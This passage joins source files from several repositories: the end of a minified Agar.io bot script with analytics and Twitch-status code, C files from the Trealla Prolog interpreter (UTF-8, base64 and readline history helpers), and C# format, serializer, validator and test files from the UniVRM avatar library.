a.w(f);
f.restore()
}
var b = new da(0, 0, 0, 32, "#5bc0de", "");
b.id = -1;
var c = new da(0, 0, 0, 32, "#5bc0de", "");
c.id = -1;
var d = document.createElement("canvas");
d.getContext("2d");
d.width = d.height = 70;
a(c, d,
"", 26, "#ebc0de");
return function() {
e(".cell-spinner").filter(":visible").each(function() {
var c = e(this),
f = Date.now(),
g = this.width,
h = this.height,
k = this.getContext("2d");
k.clearRect(0, 0, g, h);
k.save();
k.translate(g / 2, h / 2);
for (var m = 0; 10 > m; ++m) k.drawImage(d, (.1 * f + 80 * m) % (g + 140) - g / 2 - 70 - 35, h / 2 * Math.sin((.001 * f + m) % Math.PI * 2) - 35, 70, 70);
k.restore();
(c = c.attr("data-itr")) && (c = Z(c));
a(b, this, c || "", +e(this).attr("data-size"), "#5bc0de")
})
}
}();
d.createParty = function() {
Y(":party");
L = function(a) {
Ma("/#" + d.encodeURIComponent(a));
e(".partyToken").val("<PASSWORD>/#" + d.encodeURIComponent(a));
e("#helloContainer").attr("data-party-state", "1")
};
I()
};
d.joinParty = Wa;
d.cancelParty = function() {
Ma("/");
e("#helloContainer").attr("data-party-state", "0");
Y("");
I()
};
e(function() {
e(pb)
})
}
}
}
})(window, window.jQuery);
(function(i, s, o, g, r, a, m) {
i['GoogleAnalyticsObject'] = r;
i[r] = i[r] || function() {
(i[r].q = i[r].q || []).push(arguments)
}, i[r].l = 1 * new Date();
a = s.createElement(o),
m = s.getElementsByTagName(o)[0];
a.async = 1;
a.src = g;
m.parentNode.insertBefore(a, m)
})(window, document, 'script', '//www.google-analytics.com/analytics.js', 'apos');
apos('create', 'UA-64394184-1', 'auto');
apos('send', 'pageview');
window.ignoreStream = false;
window.refreshTwitch = function() {
$.ajax({
url: "https://api.twitch.tv/kraken/streams/apostolique",
cache: false,
dataType: "jsonp"
}).done(function(data) {
if (data["stream"] == null) {
//console.log("Apostolique is not online!");
window.setMessage([]);
window.onmouseup = function() {};
window.ignoreStream = false;
} else {
//console.log("Apostolique is online!");
if (!window.ignoreStream) {
window.setMessage(["twitch.tv/apostolique is online right now!", "Click the screen to open the stream!", "Press E to ignore."]);
window.onmouseup = function() {
window.open("http://www.twitch.tv/apostolique");
};
}
}
}).fail(function() {});
}
setInterval(window.refreshTwitch, 60000);
window.refreshTwitch();
| will101266/agariobot |
<|start_filename|>src/base64.h<|end_filename|>
#pragma once
// If the caller supplies a '*pdst' buffer, its length is trusted to be
// large enough and not to overflow. This allows a static or
// stack-based buffer to be used in controlled circumstances. If '*pdst'
// is NULL, a buffer will be allocated which must subsequently be freed
// by the caller.
size_t b64_encode(const char *src, size_t nbytes, char **pdst, int breaks, int cr);
size_t b64_decode(const char *src, size_t nbytes, char **pdst);
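// Illustrative usage sketch (not part of the original header; based only on
// the declarations and the buffer rules described above). 'data' and 'len'
// are hypothetical inputs; the 0, 0 arguments for 'breaks' and 'cr' are an
// assumption.
//
//   char *enc = NULL;                          // NULL: the function allocates
//   size_t enc_len = b64_encode(data, len, &enc, 0, 0);
//   char *dec = NULL;
//   size_t dec_len = b64_decode(enc, enc_len, &dec);
//   free(enc);
//   free(dec);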
<|start_filename|>src/history.h<|end_filename|>
#ifndef HISTORY_H
#define HISTORY_H
extern void history_load(const char *filename);
extern void history_keywords(const char **word_array);
extern char *history_readline_eol(const char *prompt, char eol);
extern void history_save(void);
extern int history_getch_fd(int fd);
extern int history_getch(void);
#endif
<|start_filename|>src/version.c<|end_filename|>
const char *g_version = VERSION;
<|start_filename|>src/trealla.h<|end_filename|>
#pragma once
#include <stdbool.h>
#include <stdio.h>
typedef struct prolog_ prolog;
extern prolog *pl_create();
extern void pl_destroy(prolog*);
extern bool pl_eval(prolog*, const char *expr);
extern bool pl_consult(prolog*, const char *filename);
extern bool pl_consult_fp(prolog*, FILE *fp, const char *filename);
extern int get_halt_code(prolog*);
extern bool get_halt(prolog*);
extern bool get_status(prolog*);
extern bool get_dump_vars(prolog*);
extern void set_trace(prolog*);
extern void set_quiet(prolog*);
extern void set_stats(prolog*);
extern void set_noindex(prolog*);
extern void set_opt(prolog*, int onoff);
extern int g_tpl_interrupt, g_ac, g_avc;
extern char **g_av, *g_argv0;
extern char *g_tpl_lib;
extern const char *g_version;
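// Illustrative embedding sketch (not from the original source; inferred only
// from the declarations above, so actual usage may differ). "init.pl" and the
// query string are placeholders.
//
//   prolog *pl = pl_create();
//   if (pl_consult(pl, "init.pl"))
//       pl_eval(pl, "main.");
//   pl_destroy(pl);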
<|start_filename|>src/library.h<|end_filename|>
#pragma once
#include <stdint.h>
typedef struct {
const char *name;
const unsigned char *start;
const unsigned int *len;
} library;
extern library g_libs[];
<|start_filename|>src/utf8.c<|end_filename|>
// This code follows the "be liberal in what you accept, be strict
// in what you emit" rule. It decodes deprecated 6-byte UTF-8
// sequences but will not encode them.
#include <ctype.h>
#include <wctype.h>
#include <stdio.h>
#include <stdlib.h>
#ifndef _WIN32
#include <unistd.h>
#endif
#include "utf8.h"
size_t strlen_utf8(const char *s)
{
size_t cnt = 0;
while (*s) {
unsigned char ch = *(const unsigned char *)s++;
if ((ch < 0x80) || (ch > 0xBF))
cnt++;
}
return cnt;
}
size_t substrlen_utf8(const char *s, size_t n)
{
const char *end = s + n;
size_t cnt = 0;
while (s < end) {
unsigned char ch = *(const unsigned char *)s++;
if ((ch < 0x80) || (ch > 0xBF))
cnt++;
}
return cnt;
}
const char *strchr_utf8(const char *s, int ch)
{
const char *src = s;
while (*src && (peek_char_utf8(src) != ch))
get_char_utf8(&src);
if (!*src || (peek_char_utf8(src) != ch))
return NULL;
return src;
}
const char *strrchr_utf8(const char *s, int ch)
{
const char *src = s, *save_src = NULL;
while (*src) {
while (*src && peek_char_utf8(src) != ch)
get_char_utf8(&src);
if (!*src || (peek_char_utf8(src) != ch))
return save_src;
save_src = src;
}
return save_src;
}
bool is_char_utf8(const char *src)
{
unsigned char ch = *(const unsigned char *)src;
return (ch >= 0x80) && (ch <= 0xBF);
}
int put_len_utf8(int _ch)
{
unsigned int ch = (unsigned int)_ch;
int len = 0;
if (ch <= 0x7F)
len = 1;
else if (ch <= 0x07FF)
len = 2;
else if (ch <= 0xFFFF)
len = 3;
else if (ch <= 0x010FFFF)
len = 4;
else
len = 0;
return len;
}
int put_char_bare_utf8(char *_dst, int _ch)
{
unsigned int ch = (unsigned int)_ch;
unsigned char *dst = (unsigned char *)_dst;
int len = 0;
if (ch <= 0x7F) {
*dst++ = ch;
len = 1;
} else if (ch <= 0x07FF) {
*dst = 0b11000000;
*dst++ |= (ch >> 6) & 0b00011111;
*dst = 0b10000000;
*dst++ |= (ch & 0b00111111);
len = 2;
} else if (ch <= 0xFFFF) {
*dst = 0b11100000;
*dst++ |= (ch >> 12) & 0b00001111;
*dst = 0b10000000;
*dst++ |= (ch >> 6) & 0b00111111;
*dst = 0b10000000;
*dst++ |= ch & 0b00111111;
len = 3;
} else if (ch <= 0x010FFFF) {
*dst = 0b11110000;
*dst++ |= (ch >> 18) & 0b00000111;
*dst = 0b10000000;
*dst++ |= (ch >> 12) & 0b00111111;
*dst = 0b10000000;
*dst++ |= (ch >> 6) & 0b00111111;
*dst = 0b10000000;
*dst++ |= ch & 0b00111111;
len = 4;
} else
len = 0;
return len;
}
int put_char_utf8(char *dst, int ch)
{
int len = put_char_bare_utf8(dst, ch);
dst[len] = '\0';
return len;
}
int peek_char_utf8(const char *src)
{
return get_char_utf8(&src);
}
size_t len_char_utf8(const char *_src)
{
const char *src = _src;
get_char_utf8(&src);
return src - _src;
}
int get_char_utf8(const char **_src)
{
const unsigned char *src = (const unsigned char *)*_src;
int expect = 1;
unsigned int n = 0;
while (expect--) {
unsigned char ch = *src++;
if ((ch & 0b11111100) == 0b11111100) {
n = ch & 0b00000001;
expect = 5;
} else if ((ch & 0b11111000) == 0b11111000) {
n = ch & 0b00000011;
expect = 4;
} else if ((ch & 0b11110000) == 0b11110000) {
n = ch & 0b00000111;
expect = 3;
} else if ((ch & 0b11100000) == 0b11100000) {
n = ch & 0b00001111;
expect = 2;
} else if ((ch & 0b11000000) == 0b11000000) {
n = ch & 0b00011111;
expect = 1;
} else if ((ch & 0b10000000) == 0b10000000) {
n <<= 6;
n |= ch & 0b00111111;
} else {
n = ch;
}
}
*_src = (const char *)src;
return (int)n;
}
// Note: 'fn' is a byte-getter function (e.g. fgetc)
int xgetc_utf8(int(*fn)(), void *p1)
{
unsigned int n = 0;
int expect = 1;
while (expect--) {
int _ch = fn(p1);
if (_ch == EOF)
return EOF;
unsigned char ch = (unsigned char)_ch;
if ((ch & 0b11111100) == 0b11111100) {
n = ch & 0b00000001;
expect = 5;
} else if ((ch & 0b11111000) == 0b11111000) {
n = ch & 0b00000011;
expect = 4;
} else if ((ch & 0b11110000) == 0b11110000) {
n = ch & 0b00000111;
expect = 3;
} else if ((ch & 0b11100000) == 0b11100000) {
n = ch & 0b00001111;
expect = 2;
} else if ((ch & 0b11000000) == 0b11000000) {
n = ch & 0b00011111;
expect = 1;
} else if ((ch & 0b10000000) == 0b10000000) {
n <<= 6;
n |= ch & 0b00111111;
} else {
n = ch;
}
}
return (int)n;
}
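// Illustrative call (an assumption, not from the original source): reads one
// code point from stdin using fgetc as the byte getter, as the note above
// suggests.
//
//   int cp = xgetc_utf8((int (*)())fgetc, stdin);
//   if (cp != EOF) { /* cp is a Unicode code point */ }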
int character_at_pos(const char *buffer, size_t buflen, size_t i)
{
const char *src = buffer;
size_t idx = 0;
while (src < (buffer+buflen)) {
int ch = get_char_utf8(&src);
if (idx++ == i)
return ch;
}
return 0;
}
size_t offset_at_pos(const char *buffer, size_t buflen, size_t i)
{
const char *src = buffer;
size_t idx = 0;
while (src < (buffer+buflen)) {
if (idx++ == i)
break;
get_char_utf8(&src);
}
return src - buffer;
}
<|start_filename|>src/history.c<|end_filename|>
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <assert.h>
#include <readline/readline.h>
#include <readline/history.h>
#include "history.h"
#include "utf8.h"
#include <termios.h>
#include <unistd.h>
#include "cdebug.h"
int history_getch(void)
{
struct termios oldattr, newattr;
tcgetattr(STDIN_FILENO, &oldattr);
newattr = oldattr;
newattr.c_lflag &= ~(ICANON | ECHO);
tcsetattr(STDIN_FILENO, TCSANOW, &newattr);
int ch = fgetc_utf8(stdin);
tcsetattr(STDIN_FILENO, TCSANOW, &oldattr);
return ch;
}
int history_getch_fd(int fd)
{
struct termios oldattr, newattr;
tcgetattr(fd, &oldattr);
newattr = oldattr;
newattr.c_lflag &= ~(ICANON | ECHO);
tcsetattr(fd, TCSANOW, &newattr);
int ch = fgetc_utf8(stdin);
tcsetattr(fd, TCSANOW, &oldattr);
return ch;
}
char *history_readline_eol(const char *prompt, char eol)
{
char *cmd = NULL;
char *line;
LOOP:
if ((line = readline(prompt)) == NULL)
return NULL;
if (cmd) {
size_t n = strlen(cmd) + strlen(line);
cmd = realloc(cmd, n+1);
ensure(cmd);
strcat(cmd, line);
} else {
cmd = strdup(line);
}
free(line);
const char *s = cmd;
for (;;) {
int ch = get_char_utf8(&s);
const char *end_ptr = cmd + strlen(cmd) - (strlen(cmd) ? 1 : 0);
while (isspace(*end_ptr) && (end_ptr != cmd))
end_ptr--;
if ((ch == 0) && (*end_ptr == eol)) {
if (strcmp(cmd, "halt.") && strcmp(cmd, "."))
add_history(cmd);
break;
}
if (ch == 0) {
cmd = realloc(cmd, strlen(cmd)+1+1);
ensure(cmd);
strcat(cmd, "\n");
prompt = "";
goto LOOP;
}
}
return cmd;
}
static char g_filename[1024];
void history_load(const char *filename)
{
snprintf(g_filename, sizeof(g_filename), "%s", filename);
using_history();
read_history(g_filename);
}
void history_save(void)
{
write_history(g_filename);
//rl_clear_history();
clear_history();
}
<|start_filename|>src/contrib.c<|end_filename|>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <time.h>
#include <ctype.h>
#include <math.h>
#include <float.h>
#include <errno.h>
#include "trealla.h"
#include "internal.h"
#include "builtins.h"
const struct builtins g_contrib_funcs[] =
{
{0}
};
| nickmain/trealla |
<|start_filename|>Assets/VRM10/Runtime/Format/Constraints/Format.g.cs<|end_filename|>
// This file is generated from JsonSchema. Don't modify this source code.
using System;
using System.Collections.Generic;
namespace UniGLTF.Extensions.VRMC_node_constraint
{
public enum ObjectSpace
{
model,
local,
}
public class PositionConstraint
{
// Dictionary object with extension-specific objects.
public object Extensions;
// Application-specific data.
public object Extras;
// The user-defined name of this object.
public string Name;
// The index of the node that constrains this node.
public int? Source;
// The source node will be evaluated in this space.
public ObjectSpace SourceSpace;
// The destination node will be evaluated in this space.
public ObjectSpace DestinationSpace;
// Axes to be constrained by this constraint, in X-Y-Z order.
public bool[] FreezeAxes;
// The weight of the constraint.
public float? Weight;
}
public class RotationConstraint
{
// Dictionary object with extension-specific objects.
public object Extensions;
// Application-specific data.
public object Extras;
// The user-defined name of this object.
public string Name;
// The index of the node that constrains this node.
public int? Source;
// The source node will be evaluated in this space.
public ObjectSpace SourceSpace;
// The destination node will be evaluated in this space.
public ObjectSpace DestinationSpace;
// Axes to be constrained by this constraint, in X-Y-Z order.
public bool[] FreezeAxes;
// The weight of the constraint.
public float? Weight;
}
public class AimConstraint
{
// Dictionary object with extension-specific objects.
public object Extensions;
// Application-specific data.
public object Extras;
// The user-defined name of this object.
public string Name;
// The index of the node that constrains this node.
public int? Source;
// The source node will be evaluated in this space.
public ObjectSpace SourceSpace;
// The destination node will be evaluated in this space.
public ObjectSpace DestinationSpace;
// An axis which faces the direction of its source.
public float[] AimVector;
// An up axis of the constraint.
public float[] UpVector;
// Axes to be constrained by this constraint, in Yaw-Pitch order.
public bool[] FreezeAxes;
// The weight of the constraint.
public float? Weight;
}
public class Constraint
{
// Dictionary object with extension-specific objects.
public object Extensions;
// Application-specific data.
public object Extras;
// A constraint that links the position with a source.
public PositionConstraint Position;
// A constraint that links the rotation with a source.
public RotationConstraint Rotation;
// A constraint that rotates the node to face a source.
public AimConstraint Aim;
}
public class VRMC_node_constraint
{
public const string ExtensionName = "VRMC_node_constraint";
// Dictionary object with extension-specific objects.
public object Extensions;
// Application-specific data.
public object Extras;
// Specification version of VRMC_node_constraint
public string SpecVersion;
// Contains position, rotation, or aim
public Constraint Constraint;
}
}
<|start_filename|>Assets/VRM/Editor/BlendShape/VRMBlendShapeProxyValidator.cs<|end_filename|>
using System.Collections.Generic;
using UniGLTF;
using UnityEngine;
namespace VRM
{
public static class VRMBlendShapeProxyValidator
{
public static IEnumerable<Validation> Validate(this VRMBlendShapeProxy p, GameObject _)
{
if (p == null)
{
yield return Validation.Error("VRMBlendShapeProxy is null");
yield break;
}
if (p.BlendShapeAvatar == null)
{
yield return Validation.Error("BlendShapeAvatar is null");
yield break;
}
// Check that each preset (BlendShapeKey) is unique
var used = new HashSet<BlendShapeKey>();
foreach (var c in p.BlendShapeAvatar.Clips)
{
var key = c.Key;
if (used.Contains(key))
{
yield return Validation.Error($"duplicated BlendShapeKey: {key}");
}
else
{
used.Add(key);
}
}
var materialNames = new HashSet<string>();
foreach (var r in p.GetComponentsInChildren<Renderer>(true))
{
foreach (var m in r.sharedMaterials)
{
if (m != null)
{
if (!materialNames.Contains(m.name))
{
materialNames.Add(m.name);
}
}
}
}
// Check that the referenced transforms and materials still exist
foreach (var c in p.BlendShapeAvatar.Clips)
{
for (int i = 0; i < c.Values.Length; ++i)
{
var v = c.Values[i];
var target = p.transform.Find(v.RelativePath);
if (target == null)
{
yield return Validation.Warning($"{c}.Values[{i}].RelativePath({v.RelativePath} is not found");
}
}
for (int i = 0; i < c.MaterialValues.Length; ++i)
{
var v = c.MaterialValues[i];
if (!materialNames.Contains(v.MaterialName))
{
yield return Validation.Warning($"{c}.MaterialValues[{i}].MaterialName({v.MaterialName} is not found");
}
}
}
}
}
}
<|start_filename|>docs/_templates/layout.html<|end_filename|>
{% extends "!layout.html" %}
{% block sidebartitle %}
{%- if language != "en" %}
[日本語] <a href="{{ pathto('../en/', 1) }}{{ pathto(pagename, 0, '.') }}">English</a>
{%- endif %}
{%- if language != "ja" %}
<a href="{{ pathto('../ja/', 1) }}{{ pathto(pagename, 0, '.') }}">日本語</a> [English]
{%- endif %}
{{ super() }}
{% endblock %}
<|start_filename|>Assets/VRM10/Editor/Components/Constraint/VRM10PositionConstraintEditor.cs<|end_filename|>
using System.Text;
using UnityEditor;
using UnityEngine;
namespace UniVRM10
{
[CustomEditor(typeof(VRM10PositionConstraint))]
public class VRM10PositionConstraintEditor : VRM10PositionRotationConstraintEditorBase
{
}
}
<|start_filename|>Assets/UniGLTF/Runtime/UniGLTF/IO/MeshIO/MeshVertex.cs<|end_filename|>
using System;
using System.Runtime.InteropServices;
using UnityEngine;
using UnityEngine.Rendering;
namespace UniGLTF
{
/// <summary>
/// A struct representing interleaved mesh vertex data.
/// It is uploaded to the GPU as-is.
/// </summary>
[Serializable, StructLayout(LayoutKind.Sequential)]
internal readonly struct MeshVertex
{
private readonly Vector3 _position;
private readonly Vector3 _normal;
private readonly Color _color;
private readonly Vector2 _texCoord0;
private readonly Vector2 _texCoord1;
private readonly float _boneWeight0;
private readonly float _boneWeight1;
private readonly float _boneWeight2;
private readonly float _boneWeight3;
private readonly ushort _boneIndex0;
private readonly ushort _boneIndex1;
private readonly ushort _boneIndex2;
private readonly ushort _boneIndex3;
public MeshVertex(
Vector3 position,
Vector3 normal,
Vector2 texCoord0,
Vector2 texCoord1,
Color color,
ushort boneIndex0,
ushort boneIndex1,
ushort boneIndex2,
ushort boneIndex3,
float boneWeight0,
float boneWeight1,
float boneWeight2,
float boneWeight3)
{
_position = position;
_normal = normal;
_texCoord0 = texCoord0;
_texCoord1 = texCoord1;
_color = color;
_boneIndex0 = boneIndex0;
_boneIndex1 = boneIndex1;
_boneIndex2 = boneIndex2;
_boneIndex3 = boneIndex3;
_boneWeight0 = boneWeight0;
_boneWeight1 = boneWeight1;
_boneWeight2 = boneWeight2;
_boneWeight3 = boneWeight3;
}
public static VertexAttributeDescriptor[] GetVertexAttributeDescriptor() => new[] {
new VertexAttributeDescriptor(VertexAttribute.Position),
new VertexAttributeDescriptor(VertexAttribute.Normal),
new VertexAttributeDescriptor(VertexAttribute.Color, dimension: 4),
new VertexAttributeDescriptor(VertexAttribute.TexCoord0, dimension: 2),
new VertexAttributeDescriptor(VertexAttribute.TexCoord1, dimension: 2),
new VertexAttributeDescriptor(VertexAttribute.BlendWeight, dimension: 4),
new VertexAttributeDescriptor(VertexAttribute.BlendIndices, VertexAttributeFormat.UInt16, 4),
};
}
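// Illustrative sketch (not part of the original file): because the field
// layout matches GetVertexAttributeDescriptor(), a buffer of MeshVertex can
// be handed to Unity's Mesh API directly. 'mesh' and 'vertices'
// (a NativeArray<MeshVertex>) are hypothetical.
//
//   mesh.SetVertexBufferParams(vertices.Length, MeshVertex.GetVertexAttributeDescriptor());
//   mesh.SetVertexBufferData(vertices, 0, 0, vertices.Length);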
}
<|start_filename|>Assets/VRM10/Runtime/Components/SpringBone/VRM10SpringBoneCollider.cs<|end_filename|>
using System;
using UnityEngine;
namespace UniVRM10
{
public enum VRM10SpringBoneColliderTypes
{
Sphere,
Capsule,
}
[Serializable]
public class VRM10SpringBoneCollider : MonoBehaviour
{
public VRM10SpringBoneColliderTypes ColliderType;
/// <summary>bone local position</summary>
public Vector3 Offset;
[Range(0, 1.0f)]
public float Radius;
/// <summary>bone local position</summary>
public Vector3 Tail;
public static int SelectedGuid;
public bool IsSelected => GetInstanceID() == SelectedGuid;
}
}
<|start_filename|>Assets/VRM10/Tests/ApiSampleTests.cs<|end_filename|>
using System.IO;
using NUnit.Framework;
using UniGLTF;
using UniGLTF.Extensions.VRMC_vrm;
using UnityEngine;
using VRMShaders;
namespace UniVRM10.Test
{
public class ApiSampleTests
{
VrmLib.Model ReadModel(string path)
{
var bytes = MigrationVrm.Migrate(File.ReadAllBytes(path));
var data = new GlbLowLevelParser(path, bytes).Parse();
var model = ModelReader.Read(data);
return model;
}
GameObject BuildGameObject(Vrm10Data data, bool showMesh)
{
using (var loader = new Vrm10Importer(data))
{
var loaded = loader.Load();
if (showMesh)
{
loaded.ShowMeshes();
}
loaded.EnableUpdateWhenOffscreen();
return loaded.gameObject;
}
}
[Test]
public void Sample()
{
var path = "Tests/Models/Alicia_vrm-0.51/AliciaSolid_vrm-0.51.vrm";
Debug.Log($"load: {path}");
Assert.IsTrue(Vrm10Data.TryParseOrMigrate(path, true, out Vrm10Data result));
var go = BuildGameObject(result, true);
Debug.Log(go);
// export
var vrmBytes = Vrm10Exporter.Export(go, new EditorTextureSerializer());
Debug.Log($"export {vrmBytes.Length} bytes");
}
}
}
<|start_filename|>Assets/VRM10/Runtime/Format/Constraints/Serializer.g.cs<|end_filename|>
// This file is generated from JsonSchema. Don't modify this source code.
using System;
using System.Collections.Generic;
using System.Linq;
using UniJSON;
namespace UniGLTF.Extensions.VRMC_node_constraint {
static public class GltfSerializer
{
public static void SerializeTo(ref UniGLTF.glTFExtension dst, VRMC_node_constraint extension)
{
if (dst is glTFExtensionImport)
{
throw new NotImplementedException();
}
if (!(dst is glTFExtensionExport extensions))
{
extensions = new glTFExtensionExport();
dst = extensions;
}
var f = new JsonFormatter();
Serialize(f, extension);
extensions.Add(VRMC_node_constraint.ExtensionName, f.GetStoreBytes());
}
public static void Serialize(JsonFormatter f, VRMC_node_constraint value)
{
f.BeginMap();
if(value.Extensions!=null){
f.Key("extensions");
(value.Extensions as glTFExtension).Serialize(f);
}
if(value.Extras!=null){
f.Key("extras");
(value.Extras as glTFExtension).Serialize(f);
}
if(!string.IsNullOrEmpty(value.SpecVersion)){
f.Key("specVersion");
f.Value(value.SpecVersion);
}
if(value.Constraint!=null){
f.Key("constraint");
Serialize_Constraint(f, value.Constraint);
}
f.EndMap();
}
public static void Serialize_Constraint(JsonFormatter f, Constraint value)
{
f.BeginMap();
if(value.Extensions!=null){
f.Key("extensions");
(value.Extensions as glTFExtension).Serialize(f);
}
if(value.Extras!=null){
f.Key("extras");
(value.Extras as glTFExtension).Serialize(f);
}
if(value.Position!=null){
f.Key("position");
__constraint_Serialize_Position(f, value.Position);
}
if(value.Rotation!=null){
f.Key("rotation");
__constraint_Serialize_Rotation(f, value.Rotation);
}
if(value.Aim!=null){
f.Key("aim");
__constraint_Serialize_Aim(f, value.Aim);
}
f.EndMap();
}
public static void __constraint_Serialize_Position(JsonFormatter f, PositionConstraint value)
{
f.BeginMap();
if(value.Extensions!=null){
f.Key("extensions");
(value.Extensions as glTFExtension).Serialize(f);
}
if(value.Extras!=null){
f.Key("extras");
(value.Extras as glTFExtension).Serialize(f);
}
if(!string.IsNullOrEmpty(value.Name)){
f.Key("name");
f.Value(value.Name);
}
if(value.Source.HasValue){
f.Key("source");
f.Value(value.Source.GetValueOrDefault());
}
if(true){
f.Key("sourceSpace");
f.Value(value.SourceSpace.ToString());
}
if(true){
f.Key("destinationSpace");
f.Value(value.DestinationSpace.ToString());
}
if(value.FreezeAxes!=null&&value.FreezeAxes.Count()>=3){
f.Key("freezeAxes");
__constraint__position_Serialize_FreezeAxes(f, value.FreezeAxes);
}
if(value.Weight.HasValue){
f.Key("weight");
f.Value(value.Weight.GetValueOrDefault());
}
f.EndMap();
}
public static void __constraint__position_Serialize_FreezeAxes(JsonFormatter f, bool[] value)
{
f.BeginList();
foreach(var item in value)
{
f.Value(item);
}
f.EndList();
}
public static void __constraint_Serialize_Rotation(JsonFormatter f, RotationConstraint value)
{
f.BeginMap();
if(value.Extensions!=null){
f.Key("extensions");
(value.Extensions as glTFExtension).Serialize(f);
}
if(value.Extras!=null){
f.Key("extras");
(value.Extras as glTFExtension).Serialize(f);
}
if(!string.IsNullOrEmpty(value.Name)){
f.Key("name");
f.Value(value.Name);
}
if(value.Source.HasValue){
f.Key("source");
f.Value(value.Source.GetValueOrDefault());
}
if(true){
f.Key("sourceSpace");
f.Value(value.SourceSpace.ToString());
}
if(true){
f.Key("destinationSpace");
f.Value(value.DestinationSpace.ToString());
}
if(value.FreezeAxes!=null&&value.FreezeAxes.Count()>=3){
f.Key("freezeAxes");
__constraint__rotation_Serialize_FreezeAxes(f, value.FreezeAxes);
}
if(value.Weight.HasValue){
f.Key("weight");
f.Value(value.Weight.GetValueOrDefault());
}
f.EndMap();
}
public static void __constraint__rotation_Serialize_FreezeAxes(JsonFormatter f, bool[] value)
{
f.BeginList();
foreach(var item in value)
{
f.Value(item);
}
f.EndList();
}
public static void __constraint_Serialize_Aim(JsonFormatter f, AimConstraint value)
{
f.BeginMap();
if(value.Extensions!=null){
f.Key("extensions");
(value.Extensions as glTFExtension).Serialize(f);
}
if(value.Extras!=null){
f.Key("extras");
(value.Extras as glTFExtension).Serialize(f);
}
if(!string.IsNullOrEmpty(value.Name)){
f.Key("name");
f.Value(value.Name);
}
if(value.Source.HasValue){
f.Key("source");
f.Value(value.Source.GetValueOrDefault());
}
if(true){
f.Key("sourceSpace");
f.Value(value.SourceSpace.ToString());
}
if(true){
f.Key("destinationSpace");
f.Value(value.DestinationSpace.ToString());
}
if(value.AimVector!=null&&value.AimVector.Count()>=3){
f.Key("aimVector");
__constraint__aim_Serialize_AimVector(f, value.AimVector);
}
if(value.UpVector!=null&&value.UpVector.Count()>=3){
f.Key("upVector");
__constraint__aim_Serialize_UpVector(f, value.UpVector);
}
if(value.FreezeAxes!=null&&value.FreezeAxes.Count()>=2){
f.Key("freezeAxes");
__constraint__aim_Serialize_FreezeAxes(f, value.FreezeAxes);
}
if(value.Weight.HasValue){
f.Key("weight");
f.Value(value.Weight.GetValueOrDefault());
}
f.EndMap();
}
public static void __constraint__aim_Serialize_AimVector(JsonFormatter f, float[] value)
{
f.BeginList();
foreach(var item in value)
{
f.Value(item);
}
f.EndList();
}
public static void __constraint__aim_Serialize_UpVector(JsonFormatter f, float[] value)
{
f.BeginList();
foreach(var item in value)
{
f.Value(item);
}
f.EndList();
}
public static void __constraint__aim_Serialize_FreezeAxes(JsonFormatter f, bool[] value)
{
f.BeginList();
foreach(var item in value)
{
f.Value(item);
}
f.EndList();
}
} // class
} // namespace
<|start_filename|>Assets/VRM/Tests/VRMLookAtTests.cs<|end_filename|>
using System.IO;
using NUnit.Framework;
using UniGLTF;
using UnityEngine;
namespace VRM
{
public class VRMLookAtTests
{
static string AliciaPath
{
get
{
return Path.GetFullPath(Application.dataPath + "/../Tests/Models/Alicia_vrm-0.51/AliciaSolid_vrm-0.51.vrm")
.Replace("\\", "/");
}
}
[Test]
public void VRMLookAtTest()
{
var data = new GlbFileParser(AliciaPath).Parse();
byte[] bytes = default;
using (var loader = new VRMImporterContext(new VRMData(data)))
using (var loaded = loader.Load())
{
loaded.ShowMeshes();
var go = loaded.gameObject;
var fp = go.GetComponent<VRMFirstPerson>();
GameObject.DestroyImmediate(go.GetComponent<VRMLookAtBoneApplyer>());
var lookAt = go.AddComponent<VRMLookAtBlendShapeApplyer>();
bytes = VRMEditorExporter.Export(go, null, new VRMExportSettings
{
PoseFreeze = true,
});
}
var data2 = new GlbLowLevelParser(AliciaPath, bytes).Parse();
using (var loader2 = new VRMImporterContext(new VRMData(data2)))
{
Assert.AreEqual(LookAtType.BlendShape, loader2.VRM.firstPerson.lookAtType);
}
}
[Test]
public void VRMLookAtCurveMapWithFreezeTest()
{
var data = new GlbFileParser(AliciaPath).Parse();
byte[] bytes = default;
CurveMapper horizontalInner = default;
using (var loader = new VRMImporterContext(new VRMData(data)))
using (var loaded = loader.Load())
{
loaded.ShowMeshes();
var go = loaded.gameObject;
var fp = go.GetComponent<VRMFirstPerson>();
var lookAt = go.GetComponent<VRMLookAtBoneApplyer>();
horizontalInner = lookAt.HorizontalInner;
bytes = VRMEditorExporter.Export(go, null, new VRMExportSettings
{
PoseFreeze = true,
});
}
var data2 = new GlbLowLevelParser(AliciaPath, bytes).Parse();
using (var loader = new VRMImporterContext(new VRMData(data2)))
using (var loaded = loader.Load())
{
loaded.ShowMeshes();
var lookAt = loaded.GetComponent<VRMLookAtBoneApplyer>();
Assert.AreEqual(horizontalInner.CurveXRangeDegree, lookAt.HorizontalInner.CurveXRangeDegree);
Assert.AreEqual(horizontalInner.CurveYRangeDegree, lookAt.HorizontalInner.CurveYRangeDegree);
}
}
[Test]
public void VRMLookAtCurveMapTest()
{
var data = new GlbFileParser(AliciaPath).Parse();
byte[] bytes = default;
CurveMapper horizontalInner = default;
using (var loader = new VRMImporterContext(new VRMData(data)))
using (var loaded = loader.Load())
{
loaded.ShowMeshes();
var go = loaded.gameObject;
var fp = go.GetComponent<VRMFirstPerson>();
var lookAt = go.GetComponent<VRMLookAtBoneApplyer>();
horizontalInner = lookAt.HorizontalInner;
bytes = VRMEditorExporter.Export(go, null, new VRMExportSettings
{
PoseFreeze = false,
});
}
var data2 = new GlbLowLevelParser(AliciaPath, bytes).Parse();
using (var loader = new VRMImporterContext(new VRMData(data2)))
using (var loaded = loader.Load())
{
loaded.ShowMeshes();
var lookAt = loaded.GetComponent<VRMLookAtBoneApplyer>();
Assert.AreEqual(horizontalInner.CurveXRangeDegree, lookAt.HorizontalInner.CurveXRangeDegree);
Assert.AreEqual(horizontalInner.CurveYRangeDegree, lookAt.HorizontalInner.CurveYRangeDegree);
}
}
}
}
<|start_filename|>Assets/VRM10/Runtime/Components/Constraint/VRM10AimConstraint.cs<|end_filename|>
using System;
using UniGLTF.Extensions.VRMC_node_constraint;
using UnityEngine;
namespace UniVRM10
{
[DisallowMultipleComponent]
public class VRM10AimConstraint : VRM10Constraint
{
/// <summary>
/// Only two axes: Yaw (Y) and Pitch (X)
/// </summary>
[SerializeField]
[EnumFlags]
YawPitchMask m_freezeAxes = default;
public YawPitchMask FreezeAxes
{
